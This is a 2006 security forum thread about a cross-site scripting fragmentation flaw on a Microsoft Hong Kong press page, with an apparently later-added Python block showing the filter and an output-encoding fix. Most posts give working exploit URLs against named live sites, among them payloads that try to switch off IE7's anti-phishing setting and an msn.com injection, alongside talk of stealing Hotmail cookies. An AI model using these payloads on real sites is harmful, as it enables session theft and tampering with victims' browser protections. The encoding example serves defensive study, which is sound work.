Sla.ckers.org
Microsoft proves that blacklist special character combination is not secure
Posted by: Hong
Date: December 14, 2006 05:23PM

This is an XSS Fragmentation Attack.

I discovered a Microsoft webpage that blacklists special character combinations in input: any English letter (a-z) followed by a left angle bracket (<) is not allowed, and # followed by & is not allowed either; except for that, it allows any input. That means we cannot construct any valid HTML tag directly. Is it secure? No, it isn't. The webpage filters our input only. Microsoft, are you kidding? The browser renders your output.

The webpage accepts two inputs; the server appends a character T after the first one, then appends the second string after the character T. That means we can add a left angle bracket at the end of the first string to construct a valid HTML tag that starts with <T, and the rest we put at the beginning of the second string.

Here is the PoC:
It works on my IE6 and FF1.5.
Move your mouse over the textarea.
http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20onmouseover=%22javascript:alert%28%27xss%27%29

Even though it is obscure, it should be easy to exploit.
I have tried using the Table and TD background vuln, but it doesn't work in my IE6; anyone know why?
I'd be glad to see anyone exploit it without interaction.
I am sorry that the webpage is in Chinese; I haven't tested the English version.

- Hong

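To make the fragmentation point concrete from the defender's side, here is an added example (my own reconstruction, not Microsoft's code or anything posted in the thread) of the per-input blacklist the post describes, the server-side "T" concatenation, and the fix: encode at output time for the HTML attribute context instead of blacklisting input. The attribute output context and the input name are assumptions.

```python
import html
import re

# Reconstruction (an assumption, not Microsoft's real filter) of the blacklist the
# post describes: a letter directly followed by '<', or '#' directly followed by '&'.
BLACKLIST = re.compile(r"[A-Za-z]<|#&")


def passes_blacklist(value: str) -> bool:
    """Per-input check: each parameter is inspected on its own, as the page does."""
    return BLACKLIST.search(value) is None


def render_vulnerable(fm: str, to: str) -> str:
    """Validate each input separately, then join them with the literal 'T' and
    reflect the result into an HTML attribute (assumed output context)."""
    if not (passes_blacklist(fm) and passes_blacklist(to)):
        raise ValueError("input rejected by blacklist")
    return f'<input name="range" value="{fm}T{to}">'


def render_hardened(fm: str, to: str) -> str:
    """Same concatenation, but the OUTPUT is encoded for the attribute context.
    Quotes and angle brackets can no longer close the attribute or open a tag,
    whatever the two fragments spell once joined, so no input blacklist is needed."""
    safe_fm = html.escape(fm, quote=True)
    safe_to = html.escape(to, quote=True)
    return f'<input name="range" value="{safe_fm}T{safe_to}">'


# A tag start is '<' followed by a letter; the first one is the <input> we emit.
TAG_START = re.compile(r"<[A-Za-z]+")


def injected_tags(markup: str) -> list[str]:
    """Lower-cased names of tags opened in the markup beyond the intended <input>."""
    return [m.group(0)[1:].lower() for m in TAG_START.finditer(markup)][1:]


# Constructed sample inputs: neither half contains a letter followed by '<', yet
# the server's 'T' completes '<' + 'T' + 'extarea' into a <textarea> tag.
FM = '12/14/2006"><'
TO = 'extarea title="fragment'


def demo() -> tuple[list[str], list[str]]:
    """Tags injected by the vulnerable renderer versus the hardened one."""
    return injected_tags(render_vulnerable(FM, TO)), injected_tags(render_hardened(FM, TO))
```

The blacklist rejects a direct `a<b` but accepts both halves of the sample, and only the encoded output keeps the browser from seeing a second element.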
Re: Microsoft proves that blacklist special character combination is not secure
Posted by: rsnake
Date: December 14, 2006 05:51PM

Nice find, Hong! I bet this can be modified to not require user interaction, like you suspected. I think you have found the second XSS issue in Microsoft on the boards ever. They tend to be very secure.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Microsoft proves that blacklist special character combination is not secure
Posted by: maluc
Date: December 14, 2006 08:10PM

Very nice find.. they seem to employ some very extensive QA for their microsoft.com domain. and third actually, counting yourself and thomaspollet

i don't think the same team secures their other domains though, subdomains in live.com, xbox.com, and http://ie.search.msn.com/migrate.asp?SERVER=%3C/script%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cx still have XSS (msn one previously disclosed by someone else)

overall, i'm still impressed with the security of their main domain.

-maluc

Re: Microsoft proves that blacklist special character combination is not secure
Posted by: maluc
Date: December 14, 2006 08:38PM

and before anyone gets giddy about live.com XSSes for getting hotmail cookies.. it has to be one in the login.live.com subdomain only - which seems well secured. :/

i'm not sure if firefox's or ie's pass managers can be molested from different subdomains (like support.live.com) or from the base domain perhaps (htp://live.com) .. worth testing but my guess is No.

-maluc

Re: Microsoft proves that blacklist special character combination is not secure
Posted by: WhiteAcid
Date: December 15, 2006 04:07AM

Nice one Hong, the flaw works in firefox 2.0 and Opera too.

If you use something like http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20style=%22position:%20absolute;%20top:%200px;%20left:%200px;%22%20onmouseover=%22alert%28%27xss%27%29
Then the user input is easier to trigger (basically made the textarea fill the whole screen)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: Microsoft proves that blacklist special character combination is not secure
Posted by: eyeced
Date: December 15, 2006 12:02PM

>>>> http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=extarea%20cols=1000%20rows=1000%20onmouseover=%22javascript:window.external.customizesettings(false,false,'is-is') <<<<

there's an interesting idea, put forward by maluc in an earlier post with the restriction that the xss had to come from a microsoft domain. just thought i'd mention this as a possible use of this xss. I'm sure there are quite a lot of things you are able to do from here with the IE7 javascript features.

I'll post some more when i get IE7 installed.

Re: Microsoft proves that blacklist special character combination is not secure
Posted by: maluc
Date: December 15, 2006 01:00PM

yeah, whenever you first install IE7 it takes you to a microsoft.com page to set up the Anti-phishing options among other things. If you look in the MSDN .. there's a couple special javascript functions that can turn victim's anti-phishing stuff off.. but only if the function is called from the microsoft.com domain. This XSS should be able to utilize those - i'll have to test.

You've got a good memory eyeced ^^

-maluc

Re: Microsoft proves that blacklist special character combination is not secure
Posted by: maluc
Date: December 16, 2006 12:15AM

i guess i should've posted it here instead of in a myspace thread. so moved:


okie, i tested it and you are able to add any language you wish as the default language for IE7 using this link:
http://www.microsoft.com/hk/presspass/chinese/result.aspx?fm=01/01/2006T12/14/2006%22%3e%3c/script%3e%3c&to=%20style=%22xx:expression(window.external.CustomizeSettings(false,false,'is-is')%29

go to http://www.google.com afterwards to verify the change (to icelandic). It's also set to disable the anti-phishing toolbar but doesn't seem to have any effect :/

you can, however, determine whether or not they use the anti-phishing filter with:
if(window.external.PhishingEnabled()) alert('its enabled');

Both of those can only be called from a sub.microsoft.com domain (so msdn.microsoft.com will work too)

-maluc

Re: Microsoft proves that blacklist special character combination is not secure
Posted by: Hong
Date: December 19, 2006 09:59AM

Perhaps <T style="xx:expression(window.external.CustomizeSettings(false,false,'is-is'))"> doesn't work on IE7.

- Hong
